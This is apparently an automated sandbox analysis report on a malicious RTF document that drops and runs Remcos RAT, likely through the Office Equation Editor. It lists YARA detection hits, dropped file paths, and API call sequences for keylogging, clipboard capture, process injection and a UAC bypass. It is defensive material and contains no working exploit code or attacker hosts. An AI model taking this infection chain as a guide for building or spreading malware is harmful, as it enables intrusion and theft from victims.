Code function: 5_2_00D6407C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

5_2_00D6407C

Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_2_00D6427A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,	5_2_00D6427A
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_0140427A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,	6_2_0140427A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,	7_2_004168FC

Source: C:\Users\user\AppData\Roaming\taskhostw.exe

5_2_00D6407C

Source: C:\Users\user\AppData\Roaming\taskhostw.exe

Code function: 5_2_00D5003A GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

5_2_00D5003A

Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_2_00D7CB26 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		5_2_00D7CB26
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_0141CB26 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		6_2_0141CB26

Source: Yara match	File source: 14.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.name.exe.d70000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.name.exe.d70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.name.exe.28e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.name.exe.28e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.394468723.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.854880979.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.365614526.0000000000D70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.394764051.00000000028E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: name.exe PID: 3580, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 3592, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: name.exe PID: 3856, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 3892, type: MEMORYSTR

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 14.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.name.exe.d70000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.name.exe.d70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.name.exe.28e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.name.exe.28e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.394468723.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.394502954.0000000000794000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.854766910.0000000000234000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.854880979.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.365614526.0000000000D70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.394764051.00000000028E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: name.exe PID: 3580, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 3592, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: name.exe PID: 3856, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 3892, type: MEMORYSTR

Spam, unwanted Advertisements and Ransom Demands

Contains functionalty to change the wallpaper

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 7_2_0041CA73 SystemParametersInfoW,

7_2_0041CA73

System Summary

Malicious sample detected (through community Yara rule)

Source: WC5Gv13cOQ.rtf, type: SAMPLE	Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Source: 14.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 14.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 14.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 14.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 14.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 14.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 6.2.name.exe.d70000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 6.2.name.exe.d70000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 6.2.name.exe.d70000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 6.2.name.exe.d70000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 6.2.name.exe.d70000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 6.2.name.exe.d70000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 7.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 7.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 7.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 13.2.name.exe.28e0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 13.2.name.exe.28e0000.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 13.2.name.exe.28e0000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 7.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 7.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 7.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 13.2.name.exe.28e0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 13.2.name.exe.28e0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 13.2.name.exe.28e0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000000E.00000002.394468723.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000E.00000002.394468723.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000E.00000002.394468723.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000007.00000002.854880979.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000007.00000002.854880979.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000007.00000002.854880979.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000006.00000002.365614526.0000000000D70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000006.00000002.365614526.0000000000D70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000006.00000002.365614526.0000000000D70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000000D.00000002.394764051.00000000028E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000D.00000002.394764051.00000000028E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000D.00000002.394764051.00000000028E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: Process Memory Space: name.exe PID: 3580, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: svchost.exe PID: 3592, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: name.exe PID: 3856, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: svchost.exe PID: 3892, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: This is a third-party compiled AutoIt script.	5_2_00CF3B4C
Source: taskhostw.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: taskhostw.exe, 00000005.00000000.358584246.0000000000DA4000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_921122ed-a
Source: taskhostw.exe, 00000005.00000000.358584246.0000000000DA4000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer"	memstr_86611a87-e
Source: taskhostw.exe, 00000005.00000003.362011694.0000000002B33000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_0c71adcf-b
Source: taskhostw.exe, 00000005.00000003.362011694.0000000002B33000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer"	memstr_18eed303-6
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: This is a third-party compiled AutoIt script.	6_2_01393B4C
Source: name.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: name.exe, 00000006.00000000.362092818.0000000001444000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_0bf80cf6-4
Source: name.exe, 00000006.00000000.362092818.0000000001444000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer"	memstr_d50f2897-9
Source: name.exe, 0000000D.00000002.394701390.0000000001444000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_b5798a10-8
Source: name.exe, 0000000D.00000002.394701390.0000000001444000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer"	memstr_a1fcae99-d
Source: name.exe.5.dr	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_27650534-e
Source: name.exe.5.dr	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer"	memstr_b99c995b-6
Source: taskhostw.exe.2.dr	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_b664b9a8-0
Source: taskhostw.exe.2.dr	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer"	memstr_218956b6-4
Source: taskhostw[1].exe.2.dr	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_efee54d2-7
Source: taskhostw[1].exe.2.dr	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer"	memstr_92d865f2-e

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\taskhostw.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\taskhostw[1].exe			Jump to dropped file

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 770B0000 page execute and read and write	Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0041812A GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,	7_2_0041812A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0041330D OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,	7_2_0041330D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0041BBC6 OpenProcess,NtResumeProcess,CloseHandle,	7_2_0041BBC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0041BB9A OpenProcess,NtSuspendProcess,CloseHandle,	7_2_0041BB9A

Source: C:\Users\user\AppData\Roaming\taskhostw.exe

Code function: 5_2_00D5A279: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,

5_2_00D5A279

Source: C:\Users\user\AppData\Roaming\taskhostw.exe

Code function: 5_2_00D48638 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

5_2_00D48638

Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_2_00D55264 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,	5_2_00D55264
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_013F5264 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,	6_2_013F5264
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress,	7_2_004167EF

Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_3_02AB6336	5_3_02AB6336
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_3_02AAC0A1	5_3_02AAC0A1
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_3_02A80687	5_3_02A80687
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_3_02AA2707	5_3_02AA2707
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_3_02AAE759	5_3_02AAE759
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_3_02A964FE	5_3_02A964FE
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_3_02A92590	5_3_02A92590
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_3_02A94A80	5_3_02A94A80
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_3_02AA0A04	5_3_02AA0A04
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_3_02AA0EF8	5_3_02AA0EF8
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_3_02AACEF5	5_3_02AACEF5
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_3_02A94CC0	5_3_02A94CC0
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_3_02AA6C13	5_3_02AA6C13
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_3_02B0720D	5_3_02B0720D
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_3_02A8F240	5_3_02A8F240
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_3_02AAB326	5_3_02AAB326
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_3_02AA1310	5_3_02AA1310
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_3_02AB9035	5_3_02AB9035
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_3_02AA1745	5_3_02AA1745
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_3_02A8D460	5_3_02A8D460
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_3_02A93540	5_3_02A93540
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_3_02AA1B7A	5_3_02AA1B7A
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_3_02AFF865	5_3_02AFF865
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_3_02AB5852	5_3_02AB5852
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_3_02AB19AE	5_3_02AB19AE
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_3_02AFFCE2	5_3_02AFFCE2
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_3_02A8DC00	5_3_02A8DC00
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_3_02A95C41	5_3_02A95C41
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_3_02AB5DC4	5_3_02AB5DC4
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_3_02ADDD28	5_3_02ADDD28
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_3_02AE7D32	5_3_02AE7D32
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_3_02AB7D0F	5_3_02AB7D0F
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_2_00CFE800	5_2_00CFE800
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_2_00D13307	5_2_00D13307
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_2_00D1DAF5	5_2_00D1DAF5
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_2_00CFFE40	5_2_00CFFE40
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_2_00CFE060	5_2_00CFE060
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_2_00D04140	5_2_00D04140
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_2_00D12345	5_2_00D12345
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_2_00D26452	5_2_00D26452
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_2_00D70465	5_2_00D70465
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_2_00D225AE	5_2_00D225AE
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_2_00D1277A	5_2_00D1277A
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_2_00D708E2	5_2_00D708E2
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_2_00D06841	5_2_00D06841
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_2_00D269C4	5_2_00D269C4
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_2_00D08968	5_2_00D08968
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_2_00D2890F	5_2_00D2890F
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_2_00D58932	5_2_00D58932
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_2_00D4E928	5_2_00D4E928
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_2_00D1CCA1	5_2_00D1CCA1
